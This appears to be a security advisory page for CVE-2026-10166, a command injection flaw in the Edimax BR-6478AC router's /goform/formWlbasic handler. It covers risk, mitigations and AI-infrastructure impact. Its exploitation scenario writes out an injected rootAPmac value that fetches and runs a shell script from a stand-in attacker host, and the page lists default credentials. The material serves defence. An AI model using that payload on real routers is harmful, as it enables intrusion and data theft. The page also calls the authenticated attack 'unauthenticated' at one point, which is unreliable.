CVE-2026-10166: BR-6478AC RCE via command injection

CISO Take

CVE-2026-10166 is a remotely exploitable command injection flaw in the Edimax BR-6478AC wireless router (firmware 1.23), triggered by manipulating the rootAPmac parameter in a crafted POST request to /goform/formWlbasic. An authenticated attacker with only low-level privileges — easily obtained via default or brute-forced credentials common on SOHO devices — can inject and execute arbitrary OS commands, and a working proof-of-concept exploit is already publicly available. While not yet in CISA KEV and lacking an EPSS score, the public PoC lowers the exploitation bar to script-kiddie level, effectively elevating practical risk above the CVSS 6.3 medium score suggests. For AI/ML environments, the primary risk is lateral movement: a compromised network gateway provides an attacker direct access to the internal segment hosting model servers, vector databases, and GPU compute nodes that are typically not internet-facing. Immediate mitigations include upgrading to a patched firmware version if available, restricting the management interface to trusted admin hosts only, and ensuring AI infrastructure is on a separate network segment from the router's broadcast domain.

Sources: NVD ATLAS VulnDB (vuldb.com/vuln/367418)

What is the risk?

Practical risk exceeds the CVSS 6.3 medium score due to the public exploit disclosure (E:P in the CVSS temporal vector). Authentication requirement is low-privilege — realistically bypassed via default credentials (admin/1234 or admin/admin are endemic on Edimax SOHO devices). Remote exploitation over the network with no user interaction required means any internet-exposed or LAN-accessible management interface is a viable target. In AI-centric environments, the critical concern is not the router itself but what sits behind it: an attacker with OS shell access on the gateway can intercept, redirect, or manipulate all traffic between AI components including model API calls, dataset transfers, and inference requests. No KEV listing and no EPSS data indicate no confirmed mass exploitation yet, but the public PoC changes the threat calculus immediately.

How does the attack unfold?

Reconnaissance

Attacker scans for exposed Edimax BR-6478AC management interfaces (port 80/443) on networks hosting AI infrastructure, identifying the target router.

AML.T0006

Initial Access

Attacker authenticates to the router management portal using default or brute-forced credentials, gaining access to the vulnerable /goform/ POST endpoints.

AML.T0049

Exploitation

Crafted POST request with a malicious rootAPmac value injects OS commands into the formWlbasic handler, achieving unauthenticated remote code execution on the router.

AML.T0050

Lateral Movement & Impact

Compromised router enables network pivoting to internal AI infrastructure (model servers, vector databases, inference APIs), traffic interception of model API calls, or data exfiltration of proprietary weights.

AML.T0072

Reconnaissance

Attacker scans for exposed Edimax BR-6478AC management interfaces (port 80/443) on networks hosting AI infrastructure, identifying the target router.

AML.T0006

Initial Access

Attacker authenticates to the router management portal using default or brute-forced credentials, gaining access to the vulnerable /goform/ POST endpoints.

AML.T0049

Exploitation

Crafted POST request with a malicious rootAPmac value injects OS commands into the formWlbasic handler, achieving unauthenticated remote code execution on the router.

AML.T0050

Lateral Movement & Impact

Compromised router enables network pivoting to internal AI infrastructure (model servers, vector databases, inference APIs), traffic interception of model API calls, or data exfiltration of proprietary weights.

AML.T0072

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
BR-6478AC	—	—	No patch

Do you use BR-6478AC? You're affected.

How severe is it?

CVSS 3.1

6.3 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Unchanged

C Low

I Low

A Low

What should I do?

6 steps

Patch firmware: Check edimax.com for a patched BR-6478AC firmware release; apply immediately if available.
Restrict management access: If no patch exists, block all access to /goform/ endpoints from untrusted networks using firewall ACLs or router ACLs; restrict HTTP/HTTPS management to a dedicated management VLAN with a strict allowlist of admin IP addresses.
Rotate credentials: Replace default credentials on all Edimax devices immediately; enforce strong, unique admin passwords.
Network segmentation: Ensure AI infrastructure (model servers, vector databases, GPU nodes, inference APIs) resides on a separate network segment with explicit firewall policies preventing the router from bridging untrusted traffic to AI hosts.
Detection: Monitor for unexpected outbound connections from the router (indicative of reverse shell), anomalous POST requests to /goform/formWlbasic in access logs, and unexplained configuration changes.
Inventory: Audit all Edimax BR-6478AC devices in the environment — these are often forgotten lab or branch-office routers sitting unpatched for years.

How is it classified?

Code Execution Auth Bypass Inference API AML.T0006 - Active Scanning AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 9 - Risk management system

ISO 42001

A.6.1 - AI system resources and infrastructure security

NIST AI RMF

GOVERN 1.1 - Policies and processes for AI risk management

Frequently Asked Questions

What is CVE-2026-10166?

CVE-2026-10166 is a remotely exploitable command injection flaw in the Edimax BR-6478AC wireless router (firmware 1.23), triggered by manipulating the rootAPmac parameter in a crafted POST request to /goform/formWlbasic. An authenticated attacker with only low-level privileges — easily obtained via default or brute-forced credentials common on SOHO devices — can inject and execute arbitrary OS commands, and a working proof-of-concept exploit is already publicly available. While not yet in CISA KEV and lacking an EPSS score, the public PoC lowers the exploitation bar to script-kiddie level, effectively elevating practical risk above the CVSS 6.3 medium score suggests. For AI/ML environments, the primary risk is lateral movement: a compromised network gateway provides an attacker direct access to the internal segment hosting model servers, vector databases, and GPU compute nodes that are typically not internet-facing. Immediate mitigations include upgrading to a patched firmware version if available, restricting the management interface to trusted admin hosts only, and ensuring AI infrastructure is on a separate network segment from the router's broadcast domain.

Is CVE-2026-10166 actively exploited?

No confirmed active exploitation of CVE-2026-10166 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-10166?

1. Patch firmware: Check edimax.com for a patched BR-6478AC firmware release; apply immediately if available. 2. Restrict management access: If no patch exists, block all access to /goform/ endpoints from untrusted networks using firewall ACLs or router ACLs; restrict HTTP/HTTPS management to a dedicated management VLAN with a strict allowlist of admin IP addresses. 3. Rotate credentials: Replace default credentials on all Edimax devices immediately; enforce strong, unique admin passwords. 4. Network segmentation: Ensure AI infrastructure (model servers, vector databases, GPU nodes, inference APIs) resides on a separate network segment with explicit firewall policies preventing the router from bridging untrusted traffic to AI hosts. 5. Detection: Monitor for unexpected outbound connections from the router (indicative of reverse shell), anomalous POST requests to /goform/formWlbasic in access logs, and unexplained configuration changes. 6. Inventory: Audit all Edimax BR-6478AC devices in the environment — these are often forgotten lab or branch-office routers sitting unpatched for years.

What systems are affected by CVE-2026-10166?

This vulnerability affects the following AI/ML architecture patterns: on-premises AI infrastructure, edge AI deployments, model serving (network-adjacent), training pipelines (data transfer path), RAG pipelines (if data ingestion traverses the router).

What is the CVSS score for CVE-2026-10166?

CVE-2026-10166 has a CVSS v3.1 base score of 6.3 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

on-premises AI infrastructureedge AI deploymentsmodel serving (network-adjacent)training pipelines (data transfer path)RAG pipelines (if data ingestion traverses the router)

MITRE ATLAS Techniques

AML.T0006 Active Scanning

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 9

ISO 42001: A.6.1

NIST AI RMF: GOVERN 1.1

What are the technical details?

Original Advisory

A vulnerability was determined in Edimax BR-6478AC 1.23. The affected element is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. This manipulation of the argument rootAPmac causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.

Exploitation Scenario

An attacker targeting an AI startup's on-premises GPU cluster begins by scanning the organization's IP range and identifies an Edimax BR-6478AC management portal on port 80. Using the publicly disclosed PoC, they authenticate with default credentials and send a crafted POST request to /goform/formWlbasic with a rootAPmac parameter containing an injected shell command: rootAPmac=AA:BB:CC:DD:EE:FF;curl+http://attacker-c2.com/shell.sh|sh. The router executes the payload, establishing a reverse shell to the attacker's C2 server. From this pivot point, the attacker performs internal network discovery and identifies the model inference server on 192.168.1.50 and the vector database on 192.168.1.60 — neither internet-accessible. The attacker exfiltrates proprietary model weights via direct TCP transfer through the compromised router, or alternatively performs DNS hijacking to redirect model download requests to a server hosting maliciously modified model files, poisoning the pipeline without ever directly touching the AI systems.

Weaknesses (CWE)

CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-74 — Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

[Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
[Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input.

Source: MITRE CWE corpus.